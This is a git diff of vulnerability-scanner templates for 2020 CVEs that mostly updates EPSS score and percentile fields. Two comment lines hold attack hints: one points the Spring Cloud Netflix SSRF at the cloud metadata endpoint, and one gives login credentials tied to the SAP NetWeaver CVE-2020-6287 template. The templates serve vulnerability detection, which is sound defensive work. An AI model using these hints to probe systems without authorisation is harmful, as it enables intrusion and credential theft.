cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml index 4593a4b02e..e552d51fcb 100644 --- a/http/cves/2020/CVE-2020-36365.yaml +++ b/http/cves/2020/CVE-2020-36365.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-36365 cwe-id: CWE-601 epss-score: 0.00331 - epss-percentile: 0.67387 + epss-percentile: 0.67743 cpe: cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-36510.yaml b/http/cves/2020/CVE-2020-36510.yaml index 10d46fdf44..531527d772 100644 --- a/http/cves/2020/CVE-2020-36510.yaml +++ b/http/cves/2020/CVE-2020-36510.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-36510 cwe-id: CWE-79 - epss-score: 0.00141 - epss-percentile: 0.49173 + epss-score: 0.00106 + epss-percentile: 0.42795 cpe: cpe:2.3:a:codetipi:15zine:*:*:*:*:*:wordpress:*:* metadata: verified: "false" diff --git a/http/cves/2020/CVE-2020-4463.yaml b/http/cves/2020/CVE-2020-4463.yaml index 25d368937e..c9276f59a9 100644 --- a/http/cves/2020/CVE-2020-4463.yaml +++ b/http/cves/2020/CVE-2020-4463.yaml @@ -22,8 +22,8 @@ info: cvss-score: 8.2 cve-id: CVE-2020-4463 cwe-id: CWE-611 - epss-score: 0.36503 - epss-percentile: 0.96633 + epss-score: 0.45677 + epss-percentile: 0.96997 cpe: cpe:2.3:a:ibm:maximo_asset_management:7.6.0.1:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-5191.yaml b/http/cves/2020/CVE-2020-5191.yaml index eaa5e1bb08..198c411bf6 100644 --- a/http/cves/2020/CVE-2020-5191.yaml +++ b/http/cves/2020/CVE-2020-5191.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-5191 cwe-id: CWE-79 - epss-score: 0.00383 - epss-percentile: 0.69634 + epss-score: 0.00345 + epss-percentile: 0.68372 cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:4.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-5192.yaml b/http/cves/2020/CVE-2020-5192.yaml index 3a9961fc2a..198ff42276 100644 --- a/http/cves/2020/CVE-2020-5192.yaml +++ b/http/cves/2020/CVE-2020-5192.yaml @@ -17,8 +17,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-5192 cwe-id: CWE-89 - epss-score: 0.02275 - epss-percentile: 0.88219 + epss-score: 0.31381 + epss-percentile: 0.9645 cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:4.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-5284.yaml b/http/cves/2020/CVE-2020-5284.yaml index 7fff0718d8..9c06eb76c9 100644 --- a/http/cves/2020/CVE-2020-5284.yaml +++ b/http/cves/2020/CVE-2020-5284.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-5284 cwe-id: CWE-22,CWE-23 epss-score: 0.00152 - epss-percentile: 0.50785 + epss-percentile: 0.51161 cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5307.yaml b/http/cves/2020/CVE-2020-5307.yaml index c4b4830121..d4cbe91f51 100644 --- a/http/cves/2020/CVE-2020-5307.yaml +++ b/http/cves/2020/CVE-2020-5307.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-5307 cwe-id: CWE-89 - epss-score: 0.01326 - epss-percentile: 0.84331 + epss-score: 0.02037 + epss-percentile: 0.87664 cpe: cpe:2.3:a:phpgurukul_dairy_farm_shop_management_system_project:phpgurukul_dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5405.yaml b/http/cves/2020/CVE-2020-5405.yaml index 420a19df8f..b7f6e93d90 100644 --- a/http/cves/2020/CVE-2020-5405.yaml +++ b/http/cves/2020/CVE-2020-5405.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-5405 cwe-id: CWE-22,CWE-23 epss-score: 0.00258 - epss-percentile: 0.6281 + epss-percentile: 0.63218 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5410.yaml b/http/cves/2020/CVE-2020-5410.yaml index 9862e8a51a..4d620ed955 100644 --- a/http/cves/2020/CVE-2020-5410.yaml +++ b/http/cves/2020/CVE-2020-5410.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-5410 cwe-id: CWE-22,CWE-23 - epss-score: 0.9725 - epss-percentile: 0.99762 + epss-score: 0.96802 + epss-percentile: 0.99559 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5412.yaml b/http/cves/2020/CVE-2020-5412.yaml index 7197156ee4..a90495e53c 100644 --- a/http/cves/2020/CVE-2020-5412.yaml +++ b/http/cves/2020/CVE-2020-5412.yaml @@ -14,9 +14,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2020-5412 - cwe-id: CWE-610,CWE-441 - epss-score: 0.04418 - epss-percentile: 0.91325 + cwe-id: CWE-441,CWE-610 + epss-score: 0.39161 + epss-percentile: 0.96796 cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,4 @@ http: status: - 200 -# To get crithit, try http://169.254.169.254/latest/metadata/ \ No newline at end of file +# To get crithit, try http://169.254.169.254/latest/metadata/ diff --git a/http/cves/2020/CVE-2020-5775.yaml b/http/cves/2020/CVE-2020-5775.yaml index bc36a779aa..7effda9a94 100644 --- a/http/cves/2020/CVE-2020-5775.yaml +++ b/http/cves/2020/CVE-2020-5775.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-5775 cwe-id: CWE-918 epss-score: 0.00194 - epss-percentile: 0.56373 + epss-percentile: 0.56878 cpe: cpe:2.3:a:instructure:canvas_learning_management_service:2020-07-29:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5776.yaml b/http/cves/2020/CVE-2020-5776.yaml index f8d99a687e..079f9283fe 100644 --- a/http/cves/2020/CVE-2020-5776.yaml +++ b/http/cves/2020/CVE-2020-5776.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-5776 cwe-id: CWE-352 epss-score: 0.53597 - epss-percentile: 0.97163 + epss-percentile: 0.97213 cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml index 31712c76b1..7b6741e722 100644 --- a/http/cves/2020/CVE-2020-5777.yaml +++ b/http/cves/2020/CVE-2020-5777.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-5777 cwe-id: CWE-287 epss-score: 0.02378 - epss-percentile: 0.88457 + epss-percentile: 0.88609 cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5847.yaml b/http/cves/2020/CVE-2020-5847.yaml index 5fce014723..71d61e55c3 100644 --- a/http/cves/2020/CVE-2020-5847.yaml +++ b/http/cves/2020/CVE-2020-5847.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-5847 cwe-id: CWE-94,CWE-668 - epss-score: 0.97113 - epss-percentile: 0.99678 + epss-score: 0.96998 + epss-percentile: 0.99645 cpe: cpe:2.3:a:unraid:unraid:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5902.yaml b/http/cves/2020/CVE-2020-5902.yaml index 8a4e4d8ca3..c2441a30cd 100644 --- a/http/cves/2020/CVE-2020-5902.yaml +++ b/http/cves/2020/CVE-2020-5902.yaml @@ -25,8 +25,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-5902 cwe-id: CWE-22 - epss-score: 0.97566 - epss-percentile: 0.99997 + epss-score: 0.97559 + epss-percentile: 0.99996 cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: max-request: 8 diff --git a/http/cves/2020/CVE-2020-6171.yaml b/http/cves/2020/CVE-2020-6171.yaml index c6baa16471..ae24f4154c 100644 --- a/http/cves/2020/CVE-2020-6171.yaml +++ b/http/cves/2020/CVE-2020-6171.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-6171 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47998 + epss-percentile: 0.48363 cpe: cpe:2.3:a:communilink:clink_office:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-6207.yaml b/http/cves/2020/CVE-2020-6207.yaml index 44d50b4222..f37f98b369 100644 --- a/http/cves/2020/CVE-2020-6207.yaml +++ b/http/cves/2020/CVE-2020-6207.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-6207 cwe-id: CWE-306 - epss-score: 0.97442 - epss-percentile: 0.99915 + epss-score: 0.97421 + epss-percentile: 0.99907 cpe: cpe:2.3:a:sap:solution_manager:7.20:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-6287.yaml b/http/cves/2020/CVE-2020-6287.yaml index ec79793e3f..a579dcd457 100644 --- a/http/cves/2020/CVE-2020-6287.yaml +++ b/http/cves/2020/CVE-2020-6287.yaml @@ -18,8 +18,8 @@ info: cvss-score: 10 cve-id: CVE-2020-6287 cwe-id: CWE-306 - epss-score: 0.97519 - epss-percentile: 0.99976 + epss-score: 0.97267 + epss-percentile: 0.99794 cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.30:*:*:*:*:*:*:* metadata: max-request: 1 @@ -60,4 +60,4 @@ http: - 200 # userName - sapRpoc6351 -# password - Secure!PwD8890 \ No newline at end of file +# password - Secure!PwD8890 diff --git a/http/cves/2020/CVE-2020-6308.yaml b/http/cves/2020/CVE-2020-6308.yaml index 994a9fa875..cfc35a828d 100644 --- a/http/cves/2020/CVE-2020-6308.yaml +++ b/http/cves/2020/CVE-2020-6308.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-6308 cwe-id: CWE-918 epss-score: 0.00306 - epss-percentile: 0.66005 + epss-percentile: 0.66355 cpe: cpe:2.3:a:sap:businessobjects_business_intelligence_platform:4.1:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-6637.yaml b/http/cves/2020/CVE-2020-6637.yaml index 2cb87321dc..0cc55d349f 100644 --- a/http/cves/2020/CVE-2020-6637.yaml +++ b/http/cves/2020/CVE-2020-6637.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-6637 cwe-id: CWE-89 epss-score: 0.02003 - epss-percentile: 0.87406 + epss-percentile: 0.8756 cpe: cpe:2.3:a:os4ed:opensis:7.3:*:*:*:community:*:*:* metadata: max-request: 3 diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml index b8a7c88fb3..b9da39f8c1 100644 --- a/http/cves/2020/CVE-2020-7107.yaml +++ b/http/cves/2020/CVE-2020-7107.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-7107 cwe-id: CWE-79 epss-score: 0.00517 - epss-percentile: 0.73771 + epss-percentile: 0.74053 cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-7136.yaml b/http/cves/2020/CVE-2020-7136.yaml index defb7bdfc3..c47f88be55 100644 --- a/http/cves/2020/CVE-2020-7136.yaml +++ b/http/cves/2020/CVE-2020-7136.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-7136 cwe-id: CWE-288 - epss-score: 0.16449 - epss-percentile: 0.95315 + epss-score: 0.21561 + epss-percentile: 0.95869 cpe: cpe:2.3:a:hpe:smart_update_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-7209.yaml b/http/cves/2020/CVE-2020-7209.yaml index 7c0184145b..b044d9ecce 100644 --- a/http/cves/2020/CVE-2020-7209.yaml +++ b/http/cves/2020/CVE-2020-7209.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-7209 - epss-score: 0.97202 - epss-percentile: 0.99729 + epss-score: 0.97171 + epss-percentile: 0.99735 cpe: cpe:2.3:a:hp:linuxki:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-7318.yaml b/http/cves/2020/CVE-2020-7318.yaml index bce0682f83..1fc055a2fa 100644 --- a/http/cves/2020/CVE-2020-7318.yaml +++ b/http/cves/2020/CVE-2020-7318.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-7318 cwe-id: CWE-79 epss-score: 0.00051 - epss-percentile: 0.17698 + epss-percentile: 0.17922 cpe: cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-7796.yaml b/http/cves/2020/CVE-2020-7796.yaml index 969276a9e4..30859025d4 100644 --- a/http/cves/2020/CVE-2020-7796.yaml +++ b/http/cves/2020/CVE-2020-7796.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-7796 cwe-id: CWE-918 epss-score: 0.72496 - epss-percentile: 0.97646 + epss-percentile: 0.97709 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-7943.yaml b/http/cves/2020/CVE-2020-7943.yaml index f504fdbaaf..a1d36f8a34 100644 --- a/http/cves/2020/CVE-2020-7943.yaml +++ b/http/cves/2020/CVE-2020-7943.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-7943 cwe-id: CWE-276 epss-score: 0.08018 - epss-percentile: 0.93448 + epss-percentile: 0.93547 cpe: cpe:2.3:a:puppet:puppet_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-7961.yaml b/http/cves/2020/CVE-2020-7961.yaml index 160a76e692..a31d8ab710 100644 --- a/http/cves/2020/CVE-2020-7961.yaml +++ b/http/cves/2020/CVE-2020-7961.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-7961 cwe-id: CWE-502 - epss-score: 0.97467 - epss-percentile: 0.99937 + epss-score: 0.97443 + epss-percentile: 0.99931 cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:community:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-7980.yaml b/http/cves/2020/CVE-2020-7980.yaml index 3d4eae03d0..ab72104d85 100644 --- a/http/cves/2020/CVE-2020-7980.yaml +++ b/http/cves/2020/CVE-2020-7980.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-7980 cwe-id: CWE-78 - epss-score: 0.96908 - epss-percentile: 0.99589 + epss-score: 0.96905 + epss-percentile: 0.99609 cpe: cpe:2.3:a:intelliantech:aptus_web:1.24:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml index 3749038f95..71d7eff98e 100644 --- a/http/cves/2020/CVE-2020-8115.yaml +++ b/http/cves/2020/CVE-2020-8115.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-8115 cwe-id: CWE-79 epss-score: 0.0187 - epss-percentile: 0.86916 + epss-percentile: 0.87029 cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8163.yaml b/http/cves/2020/CVE-2020-8163.yaml index 33e6362f3d..39d69df64e 100644 --- a/http/cves/2020/CVE-2020-8163.yaml +++ b/http/cves/2020/CVE-2020-8163.yaml @@ -17,8 +17,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-8163 cwe-id: CWE-94 - epss-score: 0.96847 - epss-percentile: 0.99557 + epss-score: 0.96691 + epss-percentile: 0.99519 cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8191.yaml b/http/cves/2020/CVE-2020-8191.yaml index 796bf3c510..2f174f25e9 100644 --- a/http/cves/2020/CVE-2020-8191.yaml +++ b/http/cves/2020/CVE-2020-8191.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-8191 cwe-id: CWE-79 epss-score: 0.0021 - epss-percentile: 0.58213 + epss-percentile: 0.58616 cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8193.yaml b/http/cves/2020/CVE-2020-8193.yaml index 4ef601175c..53f19c36d8 100644 --- a/http/cves/2020/CVE-2020-8193.yaml +++ b/http/cves/2020/CVE-2020-8193.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.5 cve-id: CVE-2020-8193 cwe-id: CWE-287,CWE-284 - epss-score: 0.97454 - epss-percentile: 0.99926 + epss-score: 0.93458 + epss-percentile: 0.98801 cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 6 diff --git a/http/cves/2020/CVE-2020-8194.yaml b/http/cves/2020/CVE-2020-8194.yaml index 41519acb3f..646179b03b 100644 --- a/http/cves/2020/CVE-2020-8194.yaml +++ b/http/cves/2020/CVE-2020-8194.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.5 cve-id: CVE-2020-8194 cwe-id: CWE-94 - epss-score: 0.97341 - epss-percentile: 0.99825 + epss-score: 0.90031 + epss-percentile: 0.98427 cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8209.yaml b/http/cves/2020/CVE-2020-8209.yaml index 1693837ae1..3662bd00d9 100644 --- a/http/cves/2020/CVE-2020-8209.yaml +++ b/http/cves/2020/CVE-2020-8209.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-8209 cwe-id: CWE-22 - epss-score: 0.97223 - epss-percentile: 0.99746 + epss-score: 0.97075 + epss-percentile: 0.99683 cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8497.yaml b/http/cves/2020/CVE-2020-8497.yaml index f3c0072771..7f38d0ecb6 100644 --- a/http/cves/2020/CVE-2020-8497.yaml +++ b/http/cves/2020/CVE-2020-8497.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-8497 cwe-id: CWE-306 epss-score: 0.002 - epss-percentile: 0.57104 + epss-percentile: 0.57512 cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8512.yaml b/http/cves/2020/CVE-2020-8512.yaml index 50538af251..c906f21b8f 100644 --- a/http/cves/2020/CVE-2020-8512.yaml +++ b/http/cves/2020/CVE-2020-8512.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-8512 cwe-id: CWE-79 - epss-score: 0.0046 - epss-percentile: 0.72232 + epss-score: 0.00917 + epss-percentile: 0.81094 cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8515.yaml b/http/cves/2020/CVE-2020-8515.yaml index 56842f7dd0..aac2f06349 100644 --- a/http/cves/2020/CVE-2020-8515.yaml +++ b/http/cves/2020/CVE-2020-8515.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-8515 cwe-id: CWE-78 - epss-score: 0.97144 - epss-percentile: 0.99693 + epss-score: 0.97137 + epss-percentile: 0.99715 cpe: cpe:2.3:o:draytek:vigor2960_firmware:1.3.1:beta:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8641.yaml b/http/cves/2020/CVE-2020-8641.yaml index e94584809d..8ad2858121 100644 --- a/http/cves/2020/CVE-2020-8641.yaml +++ b/http/cves/2020/CVE-2020-8641.yaml @@ -16,8 +16,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-8641 cwe-id: CWE-22 - epss-score: 0.00796 - epss-percentile: 0.7943 + epss-score: 0.00762 + epss-percentile: 0.79066 cpe: cpe:2.3:a:lotus_core_cms_project:lotus_core_cms:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8644.yaml b/http/cves/2020/CVE-2020-8644.yaml index c53f839a85..75b1ef9753 100644 --- a/http/cves/2020/CVE-2020-8644.yaml +++ b/http/cves/2020/CVE-2020-8644.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-8644 cwe-id: CWE-94 - epss-score: 0.95415 - epss-percentile: 0.99099 + epss-score: 0.96035 + epss-percentile: 0.99293 cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-8654.yaml b/http/cves/2020/CVE-2020-8654.yaml index e166b0db52..87c316c9ee 100644 --- a/http/cves/2020/CVE-2020-8654.yaml +++ b/http/cves/2020/CVE-2020-8654.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-8654 cwe-id: CWE-78 epss-score: 0.06605 - epss-percentile: 0.92868 + epss-percentile: 0.92967 cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8771.yaml b/http/cves/2020/CVE-2020-8771.yaml index b4159f8a34..8fe414063b 100644 --- a/http/cves/2020/CVE-2020-8771.yaml +++ b/http/cves/2020/CVE-2020-8771.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-8771 cwe-id: CWE-287 epss-score: 0.06142 - epss-percentile: 0.92596 + epss-percentile: 0.92698 cpe: cpe:2.3:a:wptimecapsule:wp_time_capsule:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-8772.yaml b/http/cves/2020/CVE-2020-8772.yaml index 9f70f098a3..a8cc84d779 100644 --- a/http/cves/2020/CVE-2020-8772.yaml +++ b/http/cves/2020/CVE-2020-8772.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-8772 cwe-id: CWE-862 - epss-score: 0.96852 - epss-percentile: 0.9956 + epss-score: 0.96674 + epss-percentile: 0.99511 cpe: cpe:2.3:a:revmakx:infinitewp_client:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-8813.yaml b/http/cves/2020/CVE-2020-8813.yaml index 191d76ba6b..63a472b080 100644 --- a/http/cves/2020/CVE-2020-8813.yaml +++ b/http/cves/2020/CVE-2020-8813.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-8813 cwe-id: CWE-78 - epss-score: 0.96358 - epss-percentile: 0.99352 + epss-score: 0.94641 + epss-percentile: 0.98983 cpe: cpe:2.3:a:cacti:cacti:1.2.8:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8982.yaml b/http/cves/2020/CVE-2020-8982.yaml index f6b2e7de79..c3913e7ea0 100644 --- a/http/cves/2020/CVE-2020-8982.yaml +++ b/http/cves/2020/CVE-2020-8982.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-8982 cwe-id: CWE-22 - epss-score: 0.80263 - epss-percentile: 0.97886 + epss-score: 0.81478 + epss-percentile: 0.97968 cpe: cpe:2.3:a:citrix:sharefile_storagezones_controller:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9036.yaml b/http/cves/2020/CVE-2020-9036.yaml index b47c3ae446..74d4ba281e 100644 --- a/http/cves/2020/CVE-2020-9036.yaml +++ b/http/cves/2020/CVE-2020-9036.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-9036 cwe-id: CWE-79 epss-score: 0.00113 - epss-percentile: 0.44064 + epss-percentile: 0.44439 cpe: cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9043.yaml b/http/cves/2020/CVE-2020-9043.yaml index c2d504a9fa..7013cfff9d 100644 --- a/http/cves/2020/CVE-2020-9043.yaml +++ b/http/cves/2020/CVE-2020-9043.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-9043 cwe-id: CWE-200 epss-score: 0.04173 - epss-percentile: 0.91091 + epss-percentile: 0.91189 cpe: cpe:2.3:a:wpcentral:wpcentral:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-9047.yaml b/http/cves/2020/CVE-2020-9047.yaml index 92307bd5b9..7197b47640 100644 --- a/http/cves/2020/CVE-2020-9047.yaml +++ b/http/cves/2020/CVE-2020-9047.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-9047 cwe-id: CWE-347 epss-score: 0.01182 - epss-percentile: 0.83293 + epss-percentile: 0.83494 cpe: cpe:2.3:a:johnsoncontrols:exacqvision_enterprise_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9054.yaml b/http/cves/2020/CVE-2020-9054.yaml index d939ef62f2..121aba6d7c 100644 --- a/http/cves/2020/CVE-2020-9054.yaml +++ b/http/cves/2020/CVE-2020-9054.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-9054 cwe-id: CWE-78 - epss-score: 0.97346 - epss-percentile: 0.99831 + epss-score: 0.97135 + epss-percentile: 0.99714 cpe: cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9315.yaml b/http/cves/2020/CVE-2020-9315.yaml index 97a2b479ba..35f5f41f81 100644 --- a/http/cves/2020/CVE-2020-9315.yaml +++ b/http/cves/2020/CVE-2020-9315.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-9315 cwe-id: CWE-306 - epss-score: 0.97417 - epss-percentile: 0.99889 + epss-score: 0.9738 + epss-percentile: 0.9988 cpe: cpe:2.3:a:oracle:iplanet_web_server:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-9344.yaml b/http/cves/2020/CVE-2020-9344.yaml index 636e3f7b4a..11b78d3b1d 100644 --- a/http/cves/2020/CVE-2020-9344.yaml +++ b/http/cves/2020/CVE-2020-9344.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-9344 cwe-id: CWE-79 epss-score: 0.00205 - epss-percentile: 0.57744 + epss-percentile: 0.58148 cpe: cpe:2.3:a:atlassian:subversion_application_lifecycle_management:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-9376.yaml b/http/cves/2020/CVE-2020-9376.yaml index 311de84011..646c7c7f48 100644 --- a/http/cves/2020/CVE-2020-9376.yaml +++ b/http/cves/2020/CVE-2020-9376.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-9376 cwe-id: CWE-74 - epss-score: 0.9701 - epss-percentile: 0.99626 + epss-score: 0.97104 + epss-percentile: 0.99698 cpe: cpe:2.3:o:dlink:dir-610_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9402.yaml b/http/cves/2020/CVE-2020-9402.yaml index 44c5606cec..ed04ea84bc 100644 --- a/http/cves/2020/CVE-2020-9402.yaml +++ b/http/cves/2020/CVE-2020-9402.yaml @@ -17,8 +17,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-9402 cwe-id: CWE-89 - epss-score: 0.31262 - epss-percentile: 0.96404 + epss-score: 0.38805 + epss-percentile: 0.9678 cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9425.yaml b/http/cves/2020/CVE-2020-9425.yaml index e3811e3404..92c2840f32 100644 --- a/http/cves/2020/CVE-2020-9425.yaml +++ b/http/cves/2020/CVE-2020-9425.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-9425 cwe-id: CWE-670 epss-score: 0.01611 - epss-percentile: 0.85844 + epss-percentile: 0.85987 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9483.yaml b/http/cves/2020/CVE-2020-9483.yaml index 58dd7452b9..2f6f710235 100644 --- a/http/cves/2020/CVE-2020-9483.yaml +++ b/http/cves/2020/CVE-2020-9483.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-9483 cwe-id: 